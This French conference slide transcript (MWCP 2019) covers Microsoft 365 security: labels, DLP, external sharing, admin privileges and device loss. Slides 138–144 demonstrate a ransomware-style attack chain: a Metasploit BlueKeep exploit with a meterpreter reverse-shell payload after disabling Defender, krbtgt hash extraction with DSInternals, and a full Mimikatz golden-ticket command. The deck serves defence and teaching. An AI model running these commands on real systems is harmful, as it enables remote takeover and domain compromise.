  • 81. La menace intérieure Source : Haystax Insider threat report 2019 S Guillaume Mathieu & @SP_twit #MWCP19
  • 82. La menace intérieure S Guillaume Mathieu & @SP_twit #MWCP19 Source : Haystax Insider threat report 2019
  • 83. Protection des données / RMS • IRM sur O365 (à partir de licence E3) • Faire porter les permissions définies au niveau de SharePoint sur le document. • Système de clef publique/clef privé et un chiffrement des documents à la volée (clés publiques RSA 2048 bits, et SHA-256 pour les signtaures) • Lire https://docs.microsoft.com/fr-fr/information-protection/understand-explore/how-does-it-work • Système cassable dés lors qu’on a les droits en View Only https://github.com/RUB-NDS/MS-RMS-Attacks S Guillaume Mathieu & @SP_twit #MWCP19
  • 84. Protection des données / RMS S Guillaume Mathieu & @SP_twit #MWCP19
  • 85. Etiquettes de confidentialités • Office 365 E3 requis • Disponible in Outlook, SharePoint, OWA and O365 Pro Plus clients @SP_twit #aOSKL
  • 86. Etiquettes de confidentialités - Effets • Chiffrement des fichiers -> Impossible à ouvrir pour les utilisateurs non autorisés / non authentifiés • Restriction des permissions -> Désactivation du copier-coller, impression, capture d’écran, transfert de mails , etc. • Watermarking -> sur les fichiers Word • Bloquage de la copie sur clef USB / PJ sur services non O365 -> RequiereWIP (Windows Information Protection) et Intune @SP_twit #aOSKL
  • 87. Création d’étiquettes de confidentialité • En tant qu’admin de tenant, section « Sécurité et conformité » • Dans le centre de sécurité et conformité, aller dans « Classification » > « Etiquettes de confidentialité » • Cliquer sur « Créer une étiquette » @SP_twit #aOSKL
  • 88. Publication d’étiquettes de confidentialité • Dans le centre de sécurité et conformité, aller dans « Classification » > « Etiquettes de confidentialité » • Cliquer sur « Stratégie des étiquettes» @SP_twit #aOSKL
  • 89. Nouveauté à venir sur les Labels • Etiquettes disponibles dans tous les clients (Web ou Pro Plus) • Support des fonctionnalités Search, OWA, co-édition et eDiscovery pour les documents chiffrés • Association d’étiquette de confidentialité aux Teams/GroupeO365/Sites • Support des PDF protégés dans Edge S Guillaume Mathieu & @SP_twit #MWCP19
  • 90. Application automatique d’étiquettes avec les DLP • Office 365 E5 requis • Data Loss Prevention • Basé sur des expressions régulières (RegEx) ou dictionnaires • Peut aussi provoquer des avertissements ou des blocages de fichiers • Compter 7 jours après publication pour l’application automatique S Guillaume Mathieu & @SP_twit #MWCP19
  • 91. Application automatique d’étiquettes avec les DLP • Intune requis • Bloque la copie sur périphériques non autorisés et envoi vers services non reconnus • Config: • Créer/publier les étiquettes • Config Microsoft Defender ATP • Créer une stratégie WIP avec Intune ou SCCM S Guillaume Mathieu & @SP_twit #MWCP19
  • 92. Label Auto Apply • Détection désormais en temps réel lors de la saisie dans Office Pro Plus • Application du label ou recommandation d’appliquer S Guillaume Mathieu & @SP_twit #MWCP19
  • 93. Trainable classifiers • Application des étiquettes par Machine Learning • Utilisation des critères existants ou création de critères propres (50 à 500 contenus pour apprendre et 10.000 pour les tests). S Guillaume Mathieu & @SP_twit #MWCP19
  • 94. Insider Risk Management • Détection des comportements anormaux dans la durée des utilisateurs • API Graph + Playbooks configurables + Machine Learning S Guillaume Mathieu & @SP_twit #MWCP19
  • 95. Gestion des extérieurs • Activable /OneDrive / SiteCollections /Teams • Possibilité de restreindre à des domaines • Possibilité de MFA pour les extérieurs (attribution de licences Azure AD Premium P1 + Azure MFA) via Azure AD ou Conditional Access. (Non testé avec OTP?) S Guillaume Mathieu & @SP_twit #MWCP19
  • 96. Utilisateurs extérieurs – Liens anonymes • A désactiver ! • Gestion globale via Central Admin SharePoint > Stratégies > Partage S Guillaume Mathieu & @SP_twit #MWCP19
  • 97. Utilisateurs extérieurs – Liens anonymes • Gestion des SharePoint (et Teams) depuis la central admin SharePoint > Sites > Sites Actifs > <site> > partage externe S Guillaume Mathieu & @SP_twit #MWCP19
  • 98. Utilisateurs extérieurs – Liens anonymes • Gestion des OneDrive depuis la central admin du tenant > Utilisateurs > Utilisateurs Actifs > <user> > Gérer le partage externe S Guillaume Mathieu & @SP_twit #MWCP19
  • 99. Obtenir les IP des accès anonymes Script de Tony Redmond sur https://www.petri.com/tracking- anonymous-access-sharepoint-onedrive-documents S Guillaume Mathieu & @SP_twit #MWCP19
  • 100. Annonces pour la gestion des extérieurs • Bloquer le partage en lien anonymes des fichiers sensibles • Bloquer le téléchargement des fichiers dans les liens anonymes pour tous les formats supportés par OWA • Limiter dans le temps les accès aux utilisateurs externes authentifiés S Guillaume Mathieu & @SP_twit #MWCP19
  • 101. Désactivation du transfert automatique de mails • Dans Exchange Online Powershell Module G Guillaume Mathieu & @SP_twit #MWCP19 <# Efface les forward existants #> PS > $AllForwards = Get-Mailbox -ResultSize Unlimited -Filter {(RecipientTypeDetails -ne "DiscoveryMailbox") -and ((ForwardingSmtpAddress -ne $null) -or (ForwardingAddress -ne $null))} | Select Identity PS > $AllForwards | % {Set-Mailbox -Identity $_.Identity - ForwardingSmtpAddress $null -ForwardingAddress $null} <# Desactive la possibilité de créer des forwards #> PS > Set-RemoteDomain Default -AutoForwardEnabled $false
  • 102. Le CASB avec Cloud App Security • Licence EMS E5 requise • Permet l’analyse des logs pare feu / proxy pour détecter les applications SaaS non autorisées. • Portail : https://portal.cloudappsecurity.com/ Guillaume Mathieu & @SP_twit #MWCP19S
  • 103. MIM 2016 • MIM 2016 est une suite de produits : • MIM Synchronisation Service : moteur de synchronisation avec de nombreux connecteurs • MIM portal + MIM Services + MIMWALL : moteur de workflow, portail web • BHOLD : remplacé par Azure AD Access Review • MIM 2016 Certificate Management : gestion des certificats • PAM : gestion des comptes à fort privilèges • Azure AD Connect est une version dérivée de MIM Service et MIM Synchronisation Service • MIM Synchronization Service ne nécessite pas l’achat de licences ! https://social.technet.microsoft.com/wiki/contents/articles/2487.ho w-to-license-fim-2010-and-mim-2016.aspx G Guillaume Mathieu & @SP_twit #MWCP19
  • 104. MIM 2016 G Management Agent : connecteur MIM Synchronization Service (AD, SQL, fichier texte, LDAP…). Connecteur space : copie en lecture seule du contenu d’un connecteur (AD, SQL…). Import : le contenu du système cible est copié dans le connecteur space. Export : le contenu du connecteur space est copié dans le système cible.
  • 105. MIM 2016 • Les actions effectuées lors d’une FULL Synchronization : • Filter/Delete : les objets filtrés sont chargés dans le connecteur space du Management Agent (pas dans la Metaverse). • Join : permet d’associer un objet du connecteur space avec un objet de la Metaverse selon une règle de jointure. Exemple : ExtensionAttribute1 du connecteur space AD = EmployeeID de la Metaverse) • Projection : création d’une entrée dans la Metaverse à partir d’un objet d’un connecteur space. • Provision : création d’une entrée dans un connecteur space à partir d’un objet de la Metaverse. Cette opération nécessite l’écriture d’une Metaverse Rule. Cette dernière est une DLL qui doit être écrite en VBNET ou en C#. • Import Attributes Flow (IAF) : application des règles de synchronisation connecteur space Metaverse. Les règles de transformation complexes nécessitent le développement d’une Rule Extension. Cette dernière est une DLL écrite en VBNET ou en C#. • Export Attributes Flow (EAF) : application des règles de synchronisation connecteur space Metaverse. Les règles de transformation complexes nécessitent le développement d’une Rule Extension. Cette dernière est une DLL écrite en VBNET ou en C#. G
  • 106. Azure AD Access Package • Permet de créer des groupements de ressources. • Les utilisateurs demandent l’accès aux Access Package avec / sans approbation. • Portail de demande : https://myaccess.microsoft.com • Licences Azure AD Premium P2 requis. G Guillaume Mathieu & @SP_twit #MWCP19
  • 107. Azure AD Access Review • Permet de certifier les accès des utilisateurs. • Licences Azure AD Premium P2 requis. G Guillaume Mathieu & @SP_twit #MWCP19
  • 108. En résumé • Sans EMS : • Utiliser les étiquettes de confidentialités et faites les utiliser (peut nécessiter EMS) • Gérer finement les utilisateurs externes • Désactiver les forward de mails • Créer, modifier, supprimer les identités et les comptes utilisateurs associés avec MIM 2016Synchronization Service (licence Windows Server requise). • Avec EMS : • Utiliser Microsoft Cloud App Security pour détecter le Shadow IT (applications SaaS non autorisées). • Créer, modifier, supprimer les identités et les comptes utilisateurs associés avec MIM 2016 (avec le portail MIM). • Certifier les accès de vos utilisateurs avec Azure AD Access Review. • Gérer l’accès à vos ressources avec Azure AD Access Package. • Insider Risk Management à venir Guillaume Mathieu & @SP_twit #MWCP19G
  • 109. 113 Incident #5 Fuite de la part des admins
  • 110. Cet homme était admin SharePoint S Guillaume Mathieu & @SP_twit #MWCP19
  • 111. La menace IT S Guillaume Mathieu & @SP_twit #MWCP19 Source : Haystax Insider threat report 2019
  • 112. POLP – Principe de moindre privilèges appliqué à l’admin M365 Meilleures sécurité (Snowden n’avait besoin que de faire des backups) Minimisation de la surface d’attaques extérieures Limitation de la propagation des virus Guillaume Mathieu & @SP_twit #MWCP19S
  • 113. Recommandations générales Guillaume Mathieu & @SP_twit #MWCP19 • Comptes administration nominatifs. • De 2 à 4 comptes d’admin généraux MAX • Compte(s) brise-glace (20+ chars mdp, renouvellement de MDP après usage et sur base périodique). • Machines dédiées pour utiliser les comptes admin • MFA/Passwordless obligatoire • Délégation de droits selon le principe du moindre privilège. G
  • 114. Principaux rôles d’administration Guillaume Mathieu & @SP_twit #MWCP19S • Administrateur des données de conformité (eDiscovery) • Administrateur global • Administrateur de sécurité • Administrateur de rôle privilégié • Administrateur d’utilisateurs • Administrateur Exchange • Administrateur SharePoint • Administrateur Teams • Administrateur du support technique (réinitialisation de mots de passe) • Administrateur de facturation
  • 115. Liste des comptes avec des rôles à forts privilèges Guillaume Mathieu & @SP_twit #MWCP19S
  • 116. Liste des comptes avec des rôles à forts privilèges Guillaume Mathieu & @SP_twit #MWCP19S PS > #Requires AzureAD or AzureADPreview module PS > Connect-MsolService PS > Get-MsolRole | %{ $roleName = $_.Name; Get-MsolRoleMember -RoleObjectId $_.ObjectId | select DisplayName, EmailAddress, @{Name = 'O365Role'; Expression = {$roleName}}}
  • 117. Azure AD Privileged Identity Management (PIM) • Licences Azure AD Premium P2 • Just In Time Access : les administrateurs doivent demander un accès temporaire aux rôles à fort privilèges. Guillaume Mathieu & @SP_twit #MWCP19G
  • 118. Office 365 Privileged Access Management • Complémentaire avec PIM • Exchange Online uniquement. • Permet de bloquer des commandes comme Search-Mailbox pour des administrateurs de type Organization Management.
  • 119. Créer des alertes S Guillaume Mathieu & @SP_twit #MWCP19
  • 120. Auditer les actions admins Exchange • EAC > Gestion de conformité > Audit > Exécuter un rapport d’accès aux BAL par les non propriétaires S Guillaume Mathieu & @SP_twit #MWCP19
  • 121. En résumé • Sans EMS : • POLP • Création d’alertes • Audit des logs • Avec EMS : • Mise en œuvre d’Azure AD Privileged Identity Management (PIM) • Mise en œuvre d’Office 365 Privileged Access Management Guillaume Mathieu & @SP_twit #MWCP19
  • 122. 126 Incident #6 Perte / vol de terminal
  • 123. Vol ou perte de terminal Guillaume Mathieu & @SP_twit #MWCP19G
  • 124. Elévation de privilèges → administrateur local G • Comment devenir administrateur local sur une machine non chiffrée ?
  • 125. Elévation de privilèges → administrateur du domaine G • Comment devenir administrateur du domaine quand on est administrateur local d’une machine ?
  • 126. BitLocker avec sauvegarde des clés dans Azure AD G Forcer avec Intune : https://blog.ctglobalservices.com/windows-client/mas/how-to-manage-bitlocker-on-a-azure-ad-joined- windows-10-device-managed-by-intune/#post/0
  • 127. MDM / MAM • System Center Configuration Manager (SCCM) • « vieux » • Pour Windows • Part de la suite System Center • Intégrable dans Intune • MDM pour O365 • Inclue dans O365 suscriptions • Compatible iOS, Andoid, Windows • Security policies (password requirement) • Remote wipe S Guillaume Mathieu & @SP_twit #MWCP19 • Microsoft Intune • MDM complet • Inclue dans EMS ou à part • Fait MDM pour O365 • + Mac OS • + Déploiement d’Apps • + In App policies (retrict copie /coller)
  • 128. ActiveSync pour la suppression des terminaux à distance par l’admin • Centre d’administration Exchange Online • > Destinataire • > <user> • > Périphériques mobiles • > Afficher les détails • > <device> • > Effacer les données S Guillaume Mathieu & @SP_twit #MWCP19 PS > Get-MobileDevice -Mailbox <user> | select Id PS > Clear-MobileDevice -Identity <device Id> -NotificationEmailAddresses "admin@contoso.com" # -AccountOnly pour seulement la BAL
  • 129. ActiveSync pour la suppression des terminaux à distance par l’utilisateur • Depuis interface Outlook > Paramètres > Afficher tous les paramètres d’Outlook • Général > Appareils mobiles > <appareil> > Effacer S Guillaume Mathieu & @SP_twit #MWCP19
  • 131. Ajout de périphérique manuellement • L’auto enroll (ajout automatique de périphérique lors de l’ajout du compte sur la machine – nécessite Azure AD Premium P1) • Paramètres > Accès Professionnel ou Scolaire > <compte utilisateur> > S’inscrire uniquement à la gestion des péripériques S Guillaume Mathieu & @SP_twit #MWCP19
  • 132. Suppression de terminal à distance avec Intune • Portail Azure > Intune > Rechercher un appareil > <appareil> > Réinitialiser S
  • 133. EndPoint Manager MDM / MAM sur M365 S MDM SCCM InTune
  • 134. Microsoft EndPoint Manager • Vue consolidée de tous les périphériques • Score de productivité • Recommandations de sécurité • https://devicemanagement.microsoft.com S Guillaume Mathieu & @SP_twit #MWCP19
  • 135. Suppression de terminal à distance depuis EndPoint Manager • https://devicemanagement.microsoft.com/ S
  • 136. En résumé • Sans EMS : • Suppression des données à distance via MDM • Bitlocker les disques avec sauvegarde des clés dans Active Directory ou Azure Active Directory • Avec EMS : • Suppression des données à distance via Intune Guillaume Mathieu & @SP_twit #MWCP19
  • 138. Fonctionnement d’un cryptolocker • La méthodologie : • Une faille applicative pour devenir administrateur local (comme BlueKeep) • Elévation des privilèges pour se propager sur des machines seines avec un outil comme Mimikatz. • Chiffrement des données. • Génération d’un Golden Ticket pour revenir si besoin avec DSINternals et Mimikatz. G Guillaume Mathieu & @SP_twit #MWCP19
  • 139. Metasploit : exploitation de la faille Bluekeep G Guillaume Mathieu & @SP_twit #MWCP19 • Téléchargement de Metasploit : • Gratuit pour la version communauté : • https://github.com/rapid7/metasploit- framework/wiki/Nightly-Installers • La procédure avec Metasploit : • https://headleaks.com/2019/11/11/how-hackers-exploit- bluekeep-vulnerability-to-install-cryptominer-on-windows- servers-YWEvR1Z3eCtWS0ZpZllxc2ZzUDdyQT09 • Procédures d’attaque : Désactiver Windows Defender (via GPEDIT). Lancer l’outil C:metasploit- frameworkbinmsfconsole.bat use exploit/windows/rdp/cve_2019_0708_bluekeep_rce show options set RHOSTS 192.168.140.129 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.140.127 set LPORT 4444 show targets set target 6 exploit
  • 140. Metasploit : exploitation de la faille Bluekeep G Guillaume Mathieu & @SP_twit #MWCP19 L’exploit actuel est en cours d’amélioration. A venir → un invite de commande en tant que System.
  • 141. Mimikatz : élévation de privilèges G Guillaume Mathieu & @SP_twit #MWCP19
  • 142. Générer un Golden Ticket - DSInternals • Module PowerShell DSInternals : • https://www.powershellgallery.com/packa ges/DSInternals/2.16.1 • https://www.dsinternals.com/en/list-of- cmdlets-in-the-dsinternals-module/ • Utilisation « standard » du protocole MS- DRSR (Directory Replication Service (DRS) Remote) • Permet de lire / modifier le LMHASH et le NTHASH d’un compte. • Installation simplifiée (PowerShell V5) : Install-Module DSInternals G Guillaume Mathieu & @SP_twit #MWCP19
  • 143. Générer un Golden Ticket - DSINternals • Avec DSInternals - domaine : idday.intra - contrôleur de domaine : iddaydc1.idday.intra Taper la commande suivante : Get-ADReplAccount -SamAccountName krbtgt -Domain idday -Server IDDAYDC1.idday.intra G Guillaume Mathieu & @SP_twit #MWCP19
  • 144. Générer un Golden Ticket - Mimikatz mimikatz.exe "privilege::debug" "kerberos::golden /admin:administrator /domain:idday.intra /id:4000 /sid:S-1-5-21- 3891616466-275351861-3864161629 /krbtgt:118df50a41bca303945583ad11245fce /startoffset:0 /endin:600 /renewmax:10080 /ptt" G Guillaume Mathieu & @SP_twit #MWCP19
  • 145. Sécuriser son annuaire Active Directory G • Mise en oeuvre d’Azure ATP pour détecter les attaques.
  • 146. Bloquer les machine non sûres avec Intune • Créer une stratégie Intune https://devicemanagement.microsoft.com/ • Sécurité du point de terminaison > Conformité de l’appareil > Stratégie > Créer une stratégie Guillaume Mathieu & @SP_twit #MWCP19S
  • 147. Restauration des documents OneDrive, SharePoint et Teams S
  • 148. Protection contre les cryptolocker • https://support.office.com/fr-fr/article/sauvegarder-vos-documents-images-et- dossiers-de-bureau-avec-onedrive-d61a7930-a6fb-4b95-b28a-6552e77c3057 G
  • 149. Architecte sans AD / serveur de fichiers / WSUS • Pour les sociétés < 50 personnes : • Azure AD comme annuaire d’entreprise et annuaire applicatif • Intune comme alternative aux stratégies de groupe : https://oliverkieselbach.com/2019/07/18/intune-policy-processing-on-windows- 10-explained/ • SharePoint Online / OneDrive for Business comme alternative aux serveurs de fichiers - SharePoint Migration tools : https://docs.microsoft.com/en- us/sharepointmigration/fileshare-to-odsp-migration-guide • Windows Update for Business / Delivery Optimization comme alternative à WSUS • Autopilot comme alternative aux outils de déploiement / master • TeamViewer comme outil de prise en main à distance avec interface Intune : https://www.teamviewer.com/fr/integrations/microsoft-intune G Guillaume Mathieu & @SP_twit #MWCP19
  • 150. Architecte sans AD / serveur de fichiers / WSUS G Guillaume Mathieu & @SP_twit #MWCP19 2 portail d’administration pour Intune : Via le portail Azure AD (Devices et Intune) : https://portal.azure.com Le portail Microsoft Endpoint Manager admin center : https://devicemanagement.microsoft.com/#home
  • 151. En résumé • Sans EMS : • Sécurisation de son annuaire Active Directory • Outils tiers de détection d’attaque comme Alsid for AD (payant). • Avec EMS : • Azure ATP / ATA (équivalent On-Premise). • Intune pour forcer les machines à être conforme • Pour les sociétés < 50 personnes : Azure AD Join + Intune + Office 365 (plus d’AD et de serveurs de fichiers). Guillaume Mathieu & @SP_twit #MWCP19
  • 152. 156 Incident #8 Suivi et anticipation
  • 153. Export des logs Exchange Online • Nécessite O365 E5 pour voir l’audit depuis le centre de sécurité et conformité https://protection.office.com/unifiedauditlog S Guillaume Mathieu & @SP_twit #MWCP19 PS > Connect-EXOPSSession #Connexion Exchange Online Pshell Module PS > Search-MailboxAuditLog -Identity <monuser@consoto.com> -LogonTypes Owner -StartDate 1/1/2019 -EndDate 1/1/2020 -ResultSize 2000 –ShowDetails PS > Search-MailboxAuditLog -Identity <monuser@consoto.com> -StartDate $([datetime]::Now.AddDays(-90) -EndDate $([datetime]::Now) –ShowDetails - ResultSize 2000 | Export-Csv –NoTypeInformation –Path ".MonExportMailBox$(Get-Date -Format 'yyyyMMddhhmmss').csv"
  • 154. Export des logs O365 • Centre Sécurité et Conformité > Rechercher > Rechercher dans le journal d’audit • Export Excel limité à 50K events, 3K chars S Guillaume Mathieu & @SP_twit #MWCP19 PS > Connect-EXOPSSession #Exchange Online Powershell module PS > $beginDate = [datetime]::Now.AddDays(-90) PS > $endDate = [datetime]::Now PS > $sessionId = "FullExport$(Get-Date -Format 'yyyyMMddhhmmss')” PS > Do { $tempResult = Search-UnifiedAuditLog -StartDate $beginDate -EndDate $endDate -ResultSize 1000 -SessionId $sessionId -SessionCommand ReturnLargeSet $resultSet += $tempResult } Until ($tempResult.Count -eq 0) PS > | Export-Csv –NoTypeInformation –Path ".MonExportMailBox$(Get-Date - Format 'yyyyMMddhhmmss').csv"
  • 155. La sauvegarde des données • Stratégie de sauvegarde : réplication de la données sur plusieurs centre de données + rétention des données supprimées. • Sauvegarde Microsoft : 2 fois par jour avec rétention 14 jours (sans garantie Microsoft). • Pour retrouver des données supprimer à plus de 14 jours : Utiliser un outil tiers comme Veeam Backup For Office 365. S Guillaume Mathieu & @SP_twit #MWCP19
  • 156. Se tester avec le Secure Score • https://security.microsoft.com/securescore S Guillaume Mathieu & @SP_twit #MWCP19
  • 157. En résumé • Sans EMS : • Export et sauvegarde des logs • Sauvegarder votre tenant Office 365 avec un outil tiers. • Evalualer son niveau de sécurité avec le secure score Guillaume Mathieu & @SP_twit #MWCP19
  • 159. S Guillaume Mathieu & @SP_twit #MWCP19
  • 160. Customer LockBox • Nécessite licence O365 E5 • Validation de toute action du support Microsoft aux données Exchange / SharePoint et OneDrive • Accès de 12h par défaut • Tenant admin > Settings > Security and Privacy> Customer LockBox S Guillaume Mathieu & @SP_twit #MWCP19
  • 161. Localisation • Multi geo capability (500 users min. 2$/users/mmois) • Data center FR S Guillaume Mathieu & @SP_twit #MWCP19
  • 162. Où sont les miennes • Tenant administration > Paramètres > Profil de l’organisation S Guillaume Mathieu & @SP_twit #MWCP19 PS > Connect-MsolService PS > (Get-MsolCompanyInformation).AuthorizedServiceInstances
  • 163. Où sont les miennes? S Guillaume Mathieu & @SP_twit #MWCP19
  • 164. Chiffrement des communications • Communications internes O365 : TLS ou IPSec • Communication O365/client : TLS (SHA 256, clé publique 2048 bits) S Guillaume Mathieu & @SP_twit #MWCP19
  • 165. Chiffrement au stockage • 1 ou plusieurs Blobs dans plusieurs Azure Storage (max 64Ko) • Une clef de chiffrement par fichier (AES 256bits) • Clefs stockées chiffrées dans la base de données SharePoint qui contient aussi la carte pour retrouver les Blobs • Clef de déchiffrement des containers Azure storage et des clefs dans la base de données SharePoint dans le Key Store (ou Azure Key Vault si BYOK) • Conformité du chiffrement avec FIPS 140-2 • SharePoint DB dans Azure SQL Database elle-même chiffrée par Transparent Data Encryption • Disques durs chiffrés par BitLocker S Guillaume Mathieu & @SP_twit #MWCP19
  • 166. Normes • Nombreuses normes • Habilitation Hébergeur de données de santé FR • Audit extérieurs • Accès aux documents d’audit S Guillaume Mathieu & @SP_twit #MWCP19
  • 167. Accès aux documents d’audit externes • https://servicetrust.microsoft.com/ • White papers • Rapports pen test • Audits S Guillaume Mathieu & @SP_twit #MWCP19
  • 168. RGPD • Contrat compatible • Nombreuses fonctionnalités pour conformité (eDiscovery, RMS, Etiquettes, DLP, etc.) S Guillaume Mathieu & @SP_twit #MWCP19
  • 169. Télémétrie • Envoie de données de télémétrie à Microsoft (Office Pro Plus est un « third party tool » dans les conditions générales de vente) • Auditable via la Visionneuse de Données de Diagnostic • Mise à jour des conditions de ventes Q1 2020 S Guillaume Mathieu & @SP_twit #MWCP19
  • 170. Patriot Act / SCA • S’applique uniquement aux données stockées ou transitant sur sol US • Patriot Act -> FBI, CIA, NSA, Armée • SCA -> Justice • Microsoft a tenu tête des années au DoJ sur l’extra territorialité du SCA (Stored Communication Act) jusqu’à la cours Suprême des USA (cf. Cloud Act plus tard) S Guillaume Mathieu & @SP_twit #MWCP19
  • 171. Cloud Act • Sur requête d’un procureur américain (ex: corruption, commerce avec pays sous embargo) • Applicabilité extra territoriale • Si accord bilatéral, opposition de l’hébergeur sous 14 jours possible si : • Citoyen non américain • ET va à l’encontre de la législation locale Conditions générales de vente O365 “Si Microsoft est contrainte de divulguer des Données Client ou des Données à Caractère Personnel aux pouvoirs publics, elle s’engage à en aviser le Client dans les meilleurs délais et à fournir un exemplaire de la demande, sauf interdiction légale.” Guillaume Mathieu & @SP_twit #MWCP19S
  • 172. 176 Et si j’ai juste 5 minutes?
  • 173. Sécurité si vous démarrez de zero un tenant Guillaume Mathieu & @SP_twit #MWCP19S • Admin MFA • Users MFA • Désactivation des protocole legacy • MFA pour actions à privilège • C’est le futur des paramètres par défaut Microsoft sous 5 ans
  • 174. Buy some remote consulting! Acheter des journées de conseil à distance ! https://modern-workplace.pro/mwcp-sebastien-paulet
  • 175. Meetup gratuit Mardi soir (sur inscription)
  • 176. Get sessions slide deck and information from sponsors Or click the link
  • 177. MWCP 2019 - Thanks to our Sponsors!